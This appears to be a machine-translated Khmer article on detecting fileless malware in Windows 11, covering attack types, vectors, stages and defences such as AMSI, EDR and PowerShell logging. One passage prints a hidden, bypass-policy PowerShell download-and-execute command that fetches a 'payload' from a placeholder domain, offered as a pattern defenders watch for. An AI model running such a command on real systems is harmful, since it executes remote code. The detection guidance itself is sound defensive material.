វិធីស្វែងរកមេរោគគ្មានឯកសារគ្រោះថ្នាក់នៅក្នុង Windows 11

¿តើធ្វើដូចម្តេចដើម្បីរកឃើញមេរោគគ្មានឯកសារគ្រោះថ្នាក់? សកម្មភាពវាយប្រហារ Fileless បានកើនឡើងយ៉ាងខ្លាំង ហើយធ្វើឱ្យបញ្ហាកាន់តែអាក្រក់ទៅៗ។ Windows 11 មិនមានភាពស៊ាំទេ។វិធីសាស្រ្តនេះរំលងថាស និងពឹងផ្អែកលើអង្គចងចាំ និងឧបករណ៍ប្រព័ន្ធស្របច្បាប់។ នោះហើយជាមូលហេតុដែលកម្មវិធីកំចាត់មេរោគដែលមានមូលដ្ឋានលើហត្ថលេខាតស៊ូ។ ប្រសិនបើអ្នកកំពុងស្វែងរកវិធីដែលអាចទុកចិត្តបានដើម្បីរកវា ចម្លើយគឺស្ថិតនៅក្នុងការបញ្ចូលគ្នា តេឡេម៉ែត្រ ការវិភាគឥរិយាបថ និងការគ្រប់គ្រងវីនដូ.

នៅក្នុងប្រព័ន្ធអេកូបច្ចុប្បន្ន យុទ្ធនាការដែលបំពាន PowerShell, WMI, ឬ Mshta រួមជាមួយនឹងបច្ចេកទេសស្មុគ្រស្មាញជាងមុន ដូចជាការចាក់អង្គចងចាំ ការបន្ត "ដោយមិនប៉ះ" ថាស និងសូម្បីតែ ការបំពានកម្មវិធីបង្កប់គន្លឹះគឺត្រូវយល់ពីផែនទីគំរាមកំហែង ដំណាក់កាលនៃការវាយប្រហារ និងសញ្ញាអ្វីដែលពួកគេចាកចេញ សូម្បីតែនៅពេលដែលអ្វីៗកើតឡើងនៅក្នុង RAM ក៏ដោយ។

តើអ្វីទៅជាមេរោគគ្មានឯកសារ ហើយហេតុអ្វីបានជាវាជាការព្រួយបារម្ភនៅក្នុង Windows 11?

នៅពេលយើងនិយាយអំពីការគំរាមកំហែង "គ្មានឯកសារ" យើងកំពុងសំដៅទៅលើកូដព្យាបាទនោះ។ អ្នកមិនចាំបាច់ដាក់ប្រាក់ប្រតិបត្តិថ្មីទេ។ នៅក្នុងប្រព័ន្ធឯកសារដើម្បីដំណើរការ។ ជាធម្មតាវាត្រូវបានចាក់ចូលទៅក្នុងដំណើរការដែលកំពុងដំណើរការ និងប្រតិបត្តិក្នុង RAM ដោយពឹងផ្អែកលើអ្នកបកប្រែ និងប្រព័ន្ធគោលពីរដែលបានចុះហត្ថលេខាដោយ Microsoft (ឧ. PowerShell, WMI, rundll32, mshtaវាជួយកាត់បន្ថយស្នាមជើងរបស់អ្នក និងអនុញ្ញាតឱ្យអ្នកឆ្លងកាត់ម៉ាស៊ីនដែលស្វែងរកតែឯកសារគួរឱ្យសង្ស័យប៉ុណ្ណោះ។

សូម្បីតែឯកសារការិយាល័យ ឬ PDF ដែលទាញយកភាពងាយរងគ្រោះដើម្បីបើកដំណើរការពាក្យបញ្ជាត្រូវបានចាត់ទុកថាជាផ្នែកមួយនៃបាតុភូតនេះ ពីព្រោះ បើកដំណើរការប្រតិបត្តិក្នុងអង្គចងចាំ ដោយមិនបន្សល់ទុកប្រព័ន្ធគោលពីរដែលមានប្រយោជន៍សម្រាប់ការវិភាគ។ ការរំលោភបំពាន ម៉ាក្រូ និង DDE នៅក្នុង Office ចាប់តាំងពីកូដដំណើរការក្នុងដំណើរការស្របច្បាប់ដូចជា WinWord ។

អ្នកវាយប្រហាររួមបញ្ចូលគ្នានូវវិស្វកម្មសង្គម (ការលួចបន្លំ តំណភ្ជាប់សារឥតបានការ) ជាមួយនឹងអន្ទាក់បច្ចេកទេស៖ ការចុចរបស់អ្នកប្រើប្រាស់ចាប់ផ្តើមខ្សែសង្វាក់មួយ ដែលស្គ្រីបទាញយក និងដំណើរការបន្ទុកចុងក្រោយនៅក្នុងអង្គចងចាំ។ ជៀសវាងការបន្សល់ទុកដាន នៅលើថាស។ គោលបំណងមានចាប់ពីការលួចទិន្នន័យរហូតដល់ការប្រតិបត្តិ ransomware រហូតដល់ចលនាក្រោយស្ងាត់។

Typlogies ដោយ footprint នៅក្នុងប្រព័ន្ធ៖ ពី 'pure' ទៅ hybrids

ដើម្បីជៀសវាងការយល់ច្រឡំ វាមានប្រយោជន៍ក្នុងការបែងចែកការគំរាមកំហែងតាមកម្រិតនៃអន្តរកម្មរបស់ពួកគេជាមួយប្រព័ន្ធឯកសារ។ ការបែងចែកប្រភេទនេះបញ្ជាក់ តើ​អ្វី​ដែល​នៅ​តែ​បន្ត តើ​លេខ​កូដ​រស់នៅ​ឯណា ហើយ​សញ្ញា​អ្វី​ខ្លះ​ដែល​វា​បន្សល់​ទុក?.

ប្រភេទ I: គ្មានសកម្មភាពឯកសារ

មេរោគគ្មានឯកសារទាំងស្រុង មិនសរសេរអ្វីទៅថាសទេ។ ឧទាហរណ៍បុរាណគឺការកេងប្រវ័ញ្ច a ភាពងាយរងគ្រោះនៃបណ្តាញ (ដូចជាវ៉ិចទ័រ EternalBlue ត្រឡប់មកវិញនៅពេលថ្ងៃ) ដើម្បីអនុវត្ត backdoor រស់នៅក្នុងអង្គចងចាំខឺណែល (ករណីដូចជា DoublePulsar) ។ នៅទីនេះអ្វីគ្រប់យ៉ាងកើតឡើងនៅក្នុង RAM ហើយមិនមានវត្ថុបុរាណនៅក្នុងប្រព័ន្ធឯកសារទេ។

ជម្រើសមួយទៀតគឺការបំពុល កម្មវិធីបង្កប់ នៃសមាសធាតុ៖ BIOS/UEFI អាដាប់ទ័របណ្តាញ ឧបករណ៍ភ្ជាប់ USB (បច្ចេកទេសប្រភេទ BadUSB) ឬសូម្បីតែប្រព័ន្ធរង CPU ។ ពួកគេបន្តតាមរយៈការចាប់ផ្តើមឡើងវិញ និងការដំឡើងឡើងវិញ ជាមួយនឹងការលំបាកបន្ថែមនោះ។ ផលិតផលមួយចំនួនពិនិត្យកម្មវិធីបង្កប់ទាំងនេះគឺជាការវាយប្រហារដ៏ស្មុគ្រស្មាញ មិនសូវញឹកញាប់ ប៉ុន្តែមានគ្រោះថ្នាក់ដោយសារការបំបាំងកាយ និងភាពធន់របស់វា។

ប្រភេទ II៖ សកម្មភាពរក្សាទុកដោយប្រយោល។

នៅទីនេះ មេរោគមិន "ទុក" ដែលអាចប្រតិបត្តិបានរបស់វាទេ ប៉ុន្តែប្រើកុងតឺន័រដែលគ្រប់គ្រងដោយប្រព័ន្ធ ដែលត្រូវបានរក្សាទុកជាឯកសារចាំបាច់។ ឧទហរណ៍ backdoors that plant ពាក្យបញ្ជា PowerShell នៅក្នុងឃ្លាំង WMI ហើយចាប់ផ្តើមការប្រតិបត្តិរបស់វាជាមួយនឹងតម្រងព្រឹត្តិការណ៍។ វាអាចទៅរួចក្នុងការដំឡើងវាពីបន្ទាត់ពាក្យបញ្ជាដោយមិនទម្លាក់ប្រព័ន្ធគោលពីរ ប៉ុន្តែឃ្លាំង WMI ស្ថិតនៅលើថាសជាមូលដ្ឋានទិន្នន័យស្របច្បាប់ ដែលធ្វើឱ្យវាពិបាកក្នុងការសម្អាតដោយមិនប៉ះពាល់ដល់ប្រព័ន្ធ។

តាមទស្សនៈជាក់ស្តែង ពួកគេត្រូវបានចាត់ទុកថាគ្មានឯកសារ ពីព្រោះកុងតឺន័រនោះ (WMI, Registry ។ល។) វាមិនមែនជាការប្រតិបត្តិដែលអាចរកឃើញបុរាណបានទេ។ ហើយការសម្អាតរបស់វាមិនមែនជារឿងតូចតាចទេ។ លទ្ធផល៖ ការតស៊ូលាក់លៀមជាមួយនឹងដាន "ប្រពៃណី" តិចតួច។

ប្រភេទ III៖ ត្រូវការឯកសារដើម្បីដំណើរការ

ករណីខ្លះរក្សា ក ការតស៊ូ 'គ្មានឯកសារ' នៅកម្រិតឡូជីខល ពួកគេត្រូវការគន្លឹះដែលផ្អែកលើឯកសារ។ ឧទាហរណ៍ធម្មតាគឺ Kovter៖ វាចុះឈ្មោះកិរិយាសព្ទសែលសម្រាប់ផ្នែកបន្ថែមចៃដន្យ។ នៅពេលដែលឯកសារដែលមានផ្នែកបន្ថែមនោះត្រូវបានបើក ស្គ្រីបតូចមួយដោយប្រើ mshta.exe ត្រូវបានបើកដំណើរការ ដែលបង្កើតឡើងវិញនូវខ្សែអក្សរព្យាបាទពី Registry ។

ល្បិចគឺថាឯកសារ "នុយ" ទាំងនេះដែលមានផ្នែកបន្ថែមចៃដន្យមិនមានបន្ទុកដែលអាចវិភាគបានទេ ហើយកូដភាគច្រើនស្ថិតនៅក្នុង ថត (ធុងមួយទៀត) ។ នោះហើយជាមូលហេតុដែលពួកវាត្រូវបានចាត់ថ្នាក់ថាគ្មានឯកសារក្នុងផលប៉ះពាល់ ទោះបីជានិយាយយ៉ាងតឹងរ៉ឹងក៏ដោយ ពួកគេពឹងផ្អែកលើវត្ថុបុរាណថាសមួយ ឬច្រើនជាអ្នកបង្ក។

វ៉ិចទ័រ និង 'ម៉ាស៊ីន' នៃការឆ្លង៖ កន្លែងដែលវាចូល និងកន្លែងដែលវាលាក់

ដើម្បីកែលម្អការរកឃើញ វាមានសារៈសំខាន់ណាស់ក្នុងការគូសផែនទីចំណុចចូល និងកន្លែងផ្ទុកមេរោគ។ ទស្សនៈនេះជួយក្នុងការរចនា ការត្រួតពិនិត្យជាក់លាក់ ផ្តល់អាទិភាពដល់ទូរលេខសមស្រប។

ការកេងប្រវ័ញ្ច

• ផ្អែកលើឯកសារ (ប្រភេទទី III)៖ ឯកសារ ឯកសារដែលអាចប្រតិបត្តិបាន ឯកសារ Flash/Java ចាស់ ឬឯកសារ LNK អាចទាញយកកម្មវិធីរុករកតាមអ៊ីនធឺណិត ឬម៉ាស៊ីនដែលដំណើរការពួកវាដើម្បីផ្ទុកកូដសែលទៅក្នុងអង្គចងចាំ។ វ៉ិចទ័រទីមួយគឺជាឯកសារ ប៉ុន្តែបន្ទុកធ្វើដំណើរទៅ RAM ។
• ផ្អែកលើបណ្តាញ (ប្រភេទ I)៖ កញ្ចប់ដែលទាញយកភាពងាយរងគ្រោះ (ឧ. នៅក្នុង SMB) សម្រេចបាននូវការប្រតិបត្តិនៅក្នុង userland ឬ kernel។ WannaCry បានពេញនិយមវិធីសាស្រ្តនេះ។ ការផ្ទុកអង្គចងចាំដោយផ្ទាល់ ដោយគ្មានឯកសារថ្មី។

ផ្នែករឹង

• ឧបករណ៍ (ប្រភេទ I)៖ កម្មវិធីបង្កប់ ថាស ឬកាតបណ្តាញអាចត្រូវបានផ្លាស់ប្តូរ និងណែនាំកូដ។ ពិបាកក្នុងការត្រួតពិនិត្យ និងបន្តនៅខាងក្រៅ OS ។
• ស៊ីភីយូ និងប្រព័ន្ធរងគ្រប់គ្រង (ប្រភេទ I)៖ បច្ចេកវិទ្យាដូចជា ME/AMT របស់ Intel បានបង្ហាញផ្លូវទៅកាន់ បណ្តាញ និងការប្រតិបត្តិនៅខាងក្រៅ OSវាវាយប្រហារក្នុងកម្រិតទាបបំផុត ជាមួយនឹងការបំបាំងកាយដែលមានសក្តានុពលខ្ពស់។
• យូអេសប៊ី (ប្រភេទ I)៖ BadUSB អនុញ្ញាតឱ្យអ្នករៀបចំឡើងវិញនូវ USB drive ដើម្បីក្លែងបន្លំក្តារចុច ឬ NIC ហើយបើកដំណើរការពាក្យបញ្ជា ឬប្តូរទិសចរាចរណ៍។
• ប៊ីយ៉ូស/UEFI (ប្រភេទ I)៖ កម្មវិធីបង្កប់កម្មវិធីបង្កប់ព្យាបាទ (ករណីដូចជា Mebromi) ដែលដំណើរការមុនពេលចាប់ផ្ដើមវីនដូ។
• អ្នកត្រួតពិនិត្យអេក (ប្រភេទ I)៖ ការអនុវត្តឧបករណ៍ផ្ទុកខ្ពស់តូចនៅក្រោម OS ដើម្បីលាក់វត្តមានរបស់វា។ កម្រ ប៉ុន្តែត្រូវបានគេសង្កេតឃើញរួចហើយនៅក្នុងទម្រង់នៃ hypervisor rootkits ។

ការអនុវត្តនិងការចាក់

• ផ្អែកលើឯកសារ (ប្រភេទទី III)៖ EXE/DLL/LNK ឬកិច្ចការដែលបានកំណត់ពេល ដែលចាប់ផ្តើមការចាក់ចូលទៅក្នុងដំណើរការស្របច្បាប់។
• ម៉ាក្រូ (ប្រភេទទី III)៖ VBA នៅក្នុង Office អាចធ្វើការឌិកូដ និងដំណើរការ payloads រួមទាំង ransomware ពេញលេញ ដោយមានការយល់ព្រមពីអ្នកប្រើប្រាស់តាមរយៈការបោកប្រាស់។
• ស្គ្រីប (ប្រភេទ II)៖ PowerShell, VBScript ឬ JScript ពីឯកសារ បន្ទាត់ពាក្យបញ្ជា សេវាកម្ម ការចុះឈ្មោះ ឬ WMIអ្នកវាយប្រហារអាចវាយបញ្ចូលស្គ្រីបក្នុងវគ្គពីចម្ងាយដោយមិនចាំបាច់ប៉ះថាស។
• កំណត់ត្រាចាប់ផ្ដើម (MBR/Boot) (ប្រភេទទី II)៖ ក្រុមគ្រួសារដូចជា Petya សរសេរជាន់លើផ្នែកចាប់ផ្ដើម ដើម្បីគ្រប់គ្រងនៅពេលចាប់ផ្ដើម។ វានៅខាងក្រៅប្រព័ន្ធឯកសារ ប៉ុន្តែអាចចូលប្រើ OS និងដំណោះស្រាយទំនើបដែលអាចស្ដារវាបាន។

របៀបដែលការវាយប្រហារគ្មានឯកសារដំណើរការ៖ ដំណាក់កាល និងសញ្ញា

ទោះបីជាពួកគេមិនទុកឯកសារដែលអាចប្រតិបត្តិបានក៏ដោយ ក៏យុទ្ធនាការដើរតាមតក្កវិជ្ជាជាដំណាក់កាល។ ការយល់ដឹងពីពួកគេអនុញ្ញាតឱ្យមានការត្រួតពិនិត្យ។ ព្រឹត្តិការណ៍ និងទំនាក់ទំនងរវាងដំណើរការ ដែលទុកសញ្ញាសម្គាល់។

• ការចូលប្រើដំបូងការវាយប្រហារដោយបន្លំដោយប្រើតំណភ្ជាប់ ឬឯកសារភ្ជាប់ គេហទំព័រដែលត្រូវបានសម្របសម្រួល ឬព័ត៌មានសម្ងាត់ដែលត្រូវបានលួច។ ខ្សែសង្វាក់ជាច្រើនចាប់ផ្តើមដោយឯកសារ Office ដែលចាប់ផ្តើមពាក្យបញ្ជា PowerShell.
• ការតស៊ូ: backdoors តាមរយៈ WMI (តម្រង និងការជាវ), គ្រាប់ចុចប្រតិបត្តិការចុះបញ្ជី ឬកិច្ចការដែលបានកំណត់ពេលដែលដំណើរការស្គ្រីបឡើងវិញដោយគ្មានឯកសារព្យាបាទថ្មី។
• ការបណ្តេញចេញនៅពេលដែលព័ត៌មានត្រូវបានប្រមូល វាត្រូវបានបញ្ជូនចេញពីបណ្តាញដោយប្រើដំណើរការដែលអាចទុកចិត្តបាន (កម្មវិធីរុករក, PowerShell, bitsadmin) ដើម្បីលាយចរាចរ។

គំរូនេះគឺ insidious ជាពិសេសដោយសារតែ សូចនាករនៃការវាយប្រហារ ពួកវាលាក់ក្នុងភាពធម្មតា៖ អាគុយម៉ង់បន្ទាត់ពាក្យបញ្ជា ដំណើរការខ្សែសង្វាក់ ការតភ្ជាប់ខាងក្រៅមិនធម្មតា ឬការចូលប្រើ APIs ចាក់។

បច្ចេកទេសទូទៅ៖ ពីការចងចាំរហូតដល់ការថត

តារាសម្តែងពឹងផ្អែកលើជួរនៃ វិធីសាស្ត្រ ដែលបង្កើនប្រសិទ្ធភាពការបំបាំងកាយ។ វាមានប្រយោជន៍ក្នុងការដឹងពីអ្វីដែលសាមញ្ញបំផុតដើម្បីធ្វើឱ្យការរកឃើញប្រកបដោយប្រសិទ្ធភាព។

• ស្នាក់នៅក្នុងការចងចាំ៖ កំពុងផ្ទុកបន្ទុកទៅក្នុងចន្លោះនៃដំណើរការដែលអាចទុកចិត្តបាន ដែលរង់ចាំការធ្វើឱ្យសកម្ម។ rootkits និងទំពក់ នៅក្នុងខឺណែលពួកគេបង្កើនកម្រិតនៃការលាក់បាំង។
• ការជាប់គាំងនៅក្នុងបញ្ជីឈ្មោះរក្សាទុកប្លុកដែលបានអ៊ិនគ្រីបនៅក្នុងគ្រាប់ចុច និងផ្តល់ជាតិទឹកឡើងវិញពីកម្មវិធីបើកដំណើរការស្របច្បាប់ (mshta, rundll32, wscript) ។ កម្មវិធីដំឡើងដែលមិនចេះរីងស្ងួតអាចបំផ្លាញដោយខ្លួនឯង ដើម្បីកាត់បន្ថយស្នាមជើងរបស់វា។
• ការបន្លំអត្តសញ្ញាណដោយ​ប្រើ​ឈ្មោះ​អ្នក​ប្រើ និង​ពាក្យ​សម្ងាត់​ដែល​គេ​លួច អ្នក​វាយ​ប្រហារ​ប្រតិបត្តិ​សែល និង​រុក្ខជាតិ​ពី​ចម្ងាយ ការចូលប្រើស្ងាត់ នៅក្នុង Registry ឬ WMI ។
• Ransomware 'គ្មានឯកសារ'ការអ៊ិនគ្រីប និងទំនាក់ទំនង C2 ត្រូវបានរៀបចំពី RAM ដោយកាត់បន្ថយឱកាសសម្រាប់ការរកឃើញរហូតដល់ការខូចខាតអាចមើលឃើញ។
• ឧបករណ៍ប្រតិបត្តិការ៖ ខ្សែសង្វាក់ស្វ័យប្រវត្តិដែលរកឃើញភាពងាយរងគ្រោះ និងដាក់ឱ្យដំណើរការបន្ទុកលើអង្គចងចាំតែប៉ុណ្ណោះ បន្ទាប់ពីអ្នកប្រើប្រាស់ចុច។
• ឯកសារដែលមានលេខកូដ៖ ម៉ាក្រូ និងយន្តការដូចជា DDE ដែលកេះពាក្យបញ្ជាដោយមិនរក្សាទុកការប្រតិបត្តិទៅក្នុងថាស។

ការសិក្សាឧស្សាហកម្មបានបង្ហាញពីចំណុចកំពូលគួរឱ្យកត់សម្គាល់រួចហើយ៖ ក្នុងរយៈពេលមួយនៃឆ្នាំ 2018 ក កើនឡើងជាង 90% នៅក្នុងការវាយប្រហារតាមខ្សែសង្វាក់ script-based និង PowerShell ជាសញ្ញាមួយដែលវ៉ិចទ័រត្រូវបានគេពេញចិត្តសម្រាប់ប្រសិទ្ធភាពរបស់វា។

បញ្ហាប្រឈមសម្រាប់ក្រុមហ៊ុន និងអ្នកផ្គត់ផ្គង់៖ ហេតុអ្វីបានជាការទប់ស្កាត់មិនគ្រប់គ្រាន់

វានឹងជាការទាក់ទាញឱ្យបិទ PowerShell ឬហាមឃាត់ម៉ាក្រូជារៀងរហូត អ្នកនឹងបំបែកប្រតិបត្តិការPowerShell គឺជាសសរស្តម្ភនៃការគ្រប់គ្រងទំនើប ហើយការិយាល័យគឺចាំបាច់នៅក្នុងអាជីវកម្ម។ ការទប់ស្កាត់ដោយងងឹតងងុល ជារឿយៗមិនអាចធ្វើទៅបានទេ។

លើស​ពី​នេះ​ទៅ​ទៀត មាន​វិធី​ដើម្បី​រំលង​ការ​ត្រួត​ពិនិត្យ​មូលដ្ឋាន៖ ការ​រត់ PowerShell តាម​រយៈ DLLs និង rundll32, ការ​វេច​ខ្ចប់​ស្គ្រីប​ទៅ​ក្នុង EXEs, នាំយកច្បាប់ចម្លង PowerShell ផ្ទាល់ខ្លួនរបស់អ្នក។ ឬសូម្បីតែលាក់ស្គ្រីបនៅក្នុងរូបភាព ហើយស្រង់វាទៅក្នុងអង្គចងចាំ។ ដូច្នេះ ការការពារ​មិន​អាច​ផ្អែក​លើ​ការ​បដិសេធ​ចំពោះ​អត្ថិភាព​នៃ​ឧបករណ៍​នោះ​ទេ។

កំហុសទូទៅមួយទៀតគឺការផ្ទេរការសម្រេចចិត្តទាំងមូលទៅពពក៖ ប្រសិនបើភ្នាក់ងារត្រូវរង់ចាំការឆ្លើយតបពីម៉ាស៊ីនមេ។ អ្នកបាត់បង់ការការពារក្នុងពេលជាក់ស្តែងទិន្នន័យ Telemetry អាច​ត្រូវ​បាន​ផ្ទុក​ឡើង​ដើម្បី​ពង្រឹង​ព័ត៌មាន ប៉ុន្តែ​ទិន្នន័យ​ ការ​បន្ធូរ​បន្ថយ​ត្រូវ​តែ​កើត​ឡើង​នៅ​ចំណុច​ចុង.

វិធីស្វែងរកមេរោគគ្មានឯកសារនៅក្នុង Windows 11៖ telemetry និងឥរិយាបទ

យុទ្ធសាស្ត្រឈ្នះគឺ ត្រួតពិនិត្យដំណើរការ និងអង្គចងចាំមិនមែនឯកសារទេ។ អាកប្បកិរិយាព្យាបាទមានស្ថេរភាពជាងទម្រង់ដែលឯកសារយក ដែលធ្វើឱ្យពួកវាល្អសម្រាប់ម៉ាស៊ីនបង្ការ។

• AMSI (ចំណុចប្រទាក់ស្កេនកំចាត់មេរោគ)វាស្ទាក់ចាប់ស្គ្រីប PowerShell, VBScript ឬ JScript សូម្បីតែនៅពេលដែលពួកវាត្រូវបានបង្កើតដោយថាមវន្តនៅក្នុងអង្គចងចាំក៏ដោយ។ ល្អ​សម្រាប់​ការ​ចាប់​យក​ខ្សែ​ដែល​មិន​ច្បាស់​មុន​ពេល​ប្រតិបត្តិ។
• ការត្រួតពិនិត្យដំណើរការ៖ ចាប់ផ្តើម/បញ្ចប់, PID, ឪពុកម្តាយ និងកូន, ផ្លូវ, បន្ទាត់ពាក្យបញ្ជា និង hashes រួមទាំងដើមឈើប្រតិបត្តិ ដើម្បីយល់ពីរឿងពេញលេញ។
• ការវិភាគការចងចាំ៖ ការរកឃើញនៃការចាក់ ការឆ្លុះបញ្ចាំង ឬការផ្ទុក PE ដោយមិនចាំបាច់ប៉ះឌីស និងការពិនិត្យមើលតំបន់ដែលអាចប្រតិបត្តិបានមិនធម្មតា។
• ការការពារផ្នែកចាប់ផ្តើម៖ ការគ្រប់គ្រង និងការស្ដារ MBR/EFI ក្នុងករណីមានការរំខាន។

នៅក្នុងប្រព័ន្ធអេកូ Microsoft Defender for Endpoint រួមបញ្ចូលគ្នានូវ AMSI, ការត្រួតពិនិត្យឥរិយាបថការស្កែនអង្គចងចាំ និងការរៀនម៉ាស៊ីនផ្អែកលើពពក ត្រូវបានប្រើដើម្បីធ្វើមាត្រដ្ឋានការរកឃើញប្រឆាំងនឹងវ៉ារ្យ៉ង់ថ្មី ឬមិនច្បាស់។ អ្នកលក់ផ្សេងទៀតប្រើវិធីសាស្រ្តស្រដៀងគ្នាជាមួយម៉ាស៊ីនខឺណែល-ស្នាក់នៅ។

ឧទាហរណ៍ជាក់ស្តែងនៃការជាប់ទាក់ទងគ្នា៖ ពីឯកសារទៅ PowerShell

ស្រមៃមើលខ្សែសង្វាក់ដែល Outlook ទាញយកឯកសារភ្ជាប់ Word បើកឯកសារ មាតិកាសកម្មត្រូវបានបើក ហើយ PowerShell ត្រូវបានបើកដំណើរការជាមួយប៉ារ៉ាម៉ែត្រគួរឱ្យសង្ស័យ។ តេឡេម៉ែត្រត្រឹមត្រូវនឹងបង្ហាញ បន្ទាត់ពាក្យបញ្ជា (ឧ. ExecutionPolicy Bypass, Hidden Window) ភ្ជាប់ទៅដែនដែលមិនគួរឱ្យទុកចិត្ត និងបង្កើតដំណើរការកូនដែលដំឡើងដោយខ្លួនវានៅក្នុង AppData ។

ភ្នាក់ងារដែលមានបរិបទក្នុងស្រុកមានសមត្ថភាព ឈប់និងបញ្ច្រាស សកម្មភាពព្យាបាទដោយគ្មានអន្តរាគមន៍ដោយដៃ បន្ថែមពីលើការជូនដំណឹងដល់ SIEM ឬតាមរយៈអ៊ីមែល/SMS។ ផលិតផលខ្លះបន្ថែមស្រទាប់គុណលក្ខណៈដើម (គំរូប្រភេទ StoryLine) ដែលចង្អុលទៅដំណើរការដែលមើលឃើញ (ទស្សនវិស័យ/ពាក្យ) ប៉ុន្តែចំពោះ ខ្សែស្រឡាយព្យាបាទពេញលេញ និងប្រភពដើមរបស់វា ដើម្បីសម្អាតប្រព័ន្ធយ៉ាងទូលំទូលាយ។

លំនាំពាក្យបញ្ជាធម្មតាដែលត្រូវប្រយ័ត្នអាចមើលទៅដូចនេះ៖ powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');តក្កវិជ្ជាមិនមែនជាខ្សែអក្សរពិតប្រាកដនោះទេប៉ុន្តែ សំណុំនៃសញ្ញា៖ គោលការណ៍ផ្លូវវាង បង្អួចដែលលាក់ លុបការទាញយក និងការប្រតិបត្តិក្នុងអង្គចងចាំ។

AMSI, បំពង់បង្ហូរប្រេង និងតួនាទីរបស់តួអង្គនីមួយៗ៖ ពីចំណុចបញ្ចប់ទៅ SOC

លើសពីការចាប់យកស្គ្រីប ស្ថាបត្យកម្មដ៏រឹងមាំរៀបចំជំហានដែលសម្របសម្រួលការស៊ើបអង្កេត និងការឆ្លើយតប។ ភស្តុតាងកាន់តែច្រើនមុនពេលប្រតិបត្តិបន្ទុកកាន់តែល្អ។ប្រសើរជាង។

• ការស្ទាក់ចាប់ស្គ្រីបAMSI ផ្តល់មាតិកា (ទោះបីជាវាត្រូវបានបង្កើតភ្លាមៗក៏ដោយ) សម្រាប់ការវិភាគឋិតិវន្ត និងថាមវន្តនៅក្នុងបំពង់មេរោគ។
• ដំណើរការព្រឹត្តិការណ៍PIDs, binaries, hash, routes និងទិន្នន័យផ្សេងទៀតត្រូវបានប្រមូល។ អាគុយម៉ង់ការបង្កើតដើមឈើដំណើរការដែលនាំទៅដល់បន្ទុកចុងក្រោយ។
• ការរកឃើញនិងការរាយការណ៍ការរកឃើញត្រូវបានបង្ហាញនៅលើកុងសូលផលិតផល និងបញ្ជូនបន្តទៅវេទិកាបណ្តាញ (NDR) សម្រាប់ការមើលឃើញយុទ្ធនាការ។
• ការធានារបស់អ្នកប្រើប្រាស់ទោះបីជាស្គ្រីបត្រូវបានចាក់ចូលទៅក្នុងអង្គចងចាំក៏ដោយ ក្របខ័ណ្ឌ AMSI ស្ទាក់ចាប់វា។ នៅក្នុងកំណែដែលត្រូវគ្នានៃវីនដូ។
• សមត្ថភាពអ្នកគ្រប់គ្រង៖ ការកំណត់រចនាសម្ព័ន្ធគោលការណ៍ដើម្បីបើកការត្រួតពិនិត្យស្គ្រីប, ការទប់ស្កាត់ផ្អែកលើអាកប្បកិរិយា និងបង្កើតរបាយការណ៍ពីកុងសូល។
• ការងារ SOC៖ ការទាញយកវត្ថុបុរាណ (VM UUID, កំណែប្រព័ន្ធប្រតិបត្តិការ, ប្រភេទស្គ្រីប, ដំណើរការចាប់ផ្តើម និងមេរបស់វា, សញ្ញា និងបន្ទាត់ពាក្យបញ្ជា) ដើម្បីបង្កើតប្រវត្តិ និង ច្បាប់លើក អនាគត។

នៅពេលដែលវេទិកាអនុញ្ញាតឱ្យនាំចេញ សតិបណ្ដោះអាសន្ន ពាក់ព័ន្ធនឹងការប្រតិបត្តិ អ្នកស្រាវជ្រាវអាចបង្កើតការរកឃើញថ្មី និងពង្រឹងការការពារប្រឆាំងនឹងវ៉ារ្យ៉ង់ស្រដៀងគ្នា។

វិធានការជាក់ស្តែងនៅក្នុង Windows 11: ការការពារ និងការបរបាញ់

បន្ថែមពីលើការមាន EDR ជាមួយនឹងការត្រួតពិនិត្យអង្គចងចាំ និង AMSI, Windows 11 អនុញ្ញាតឱ្យអ្នកបិទកន្លែងវាយប្រហារ និងបង្កើនភាពមើលឃើញជាមួយនឹង ការគ្រប់គ្រងដើម.

• ការចុះឈ្មោះ និងការរឹតបន្តឹងនៅក្នុង PowerShellបើកដំណើរការ Script Block Logging និង Module Logging អនុវត្តរបៀបដាក់កម្រិតតាមដែលអាចធ្វើបាន និងគ្រប់គ្រងការប្រើប្រាស់ ផ្លូវវាង/លាក់.
• ច្បាប់កាត់បន្ថយផ្ទៃវាយប្រហារ (ASR)៖ រារាំងការបើកដំណើរការស្គ្រីបដោយដំណើរការ Office និង ការរំលោភបំពាន WMI/PSExec នៅពេលមិនត្រូវការ។
• គោលនយោបាយម៉ាក្រូការិយាល័យ៖ បិទតាមលំនាំដើម ការចុះហត្ថលេខាម៉ាក្រូខាងក្នុង និងបញ្ជីទុកចិត្តយ៉ាងតឹងរឹង។ តាមដានលំហូរ DDE ចាស់។
• សវនកម្ម និងចុះបញ្ជី WMI៖ ត្រួតពិនិត្យការជាវព្រឹត្តិការណ៍ និងសោប្រតិបត្តិដោយស្វ័យប្រវត្តិ (រត់, RunOnce, Winlogon) ក៏ដូចជាការបង្កើតភារកិច្ច បានកំណត់ពេល.
• ការការពារការចាប់ផ្តើម៖ បើកដំណើរការ Secure Boot ពិនិត្យភាពត្រឹមត្រូវ MBR/EFI និងធ្វើឱ្យមានសុពលភាពថាមិនមានការកែប្រែនៅពេលចាប់ផ្តើមទេ។
• ការបិទភ្ជាប់និងការឡើងរឹង៖ បិទភាពងាយរងគ្រោះដែលអាចកេងប្រវ័ញ្ចបាននៅក្នុងកម្មវិធីរុករកតាមអ៊ីនធឺណិត សមាសធាតុការិយាល័យ និងសេវាកម្មបណ្តាញ។
• ការយល់ដឹង៖ បណ្តុះបណ្តាលអ្នកប្រើប្រាស់ និងក្រុមបច្ចេកទេសក្នុងការបន្លំ និងសញ្ញានៃ ការប្រហារជីវិតដោយសម្ងាត់.

សម្រាប់ការបរបាញ់ ផ្តោតលើសំណួរអំពី៖ ការបង្កើតដំណើរការដោយ Office ឆ្ពោះទៅកាន់ PowerShell/MSHTA អាគុយម៉ង់ជាមួយ ខ្សែអក្សរទាញយក/ទាញយកឯកសារស្គ្រីបដែលមានភាពច្របូកច្របល់ច្បាស់លាស់ ការចាក់ឆ្លុះបញ្ចាំង និងបណ្តាញខាងក្រៅទៅកាន់ TLDs គួរឱ្យសង្ស័យ។ យោងឆ្លងកាត់សញ្ញាទាំងនេះជាមួយនឹងកេរ្តិ៍ឈ្មោះ និងភាពញឹកញាប់ ដើម្បីកាត់បន្ថយសំលេងរំខាន។

តើម៉ាស៊ីននីមួយៗអាចរកឃើញអ្វីខ្លះនៅថ្ងៃនេះ?

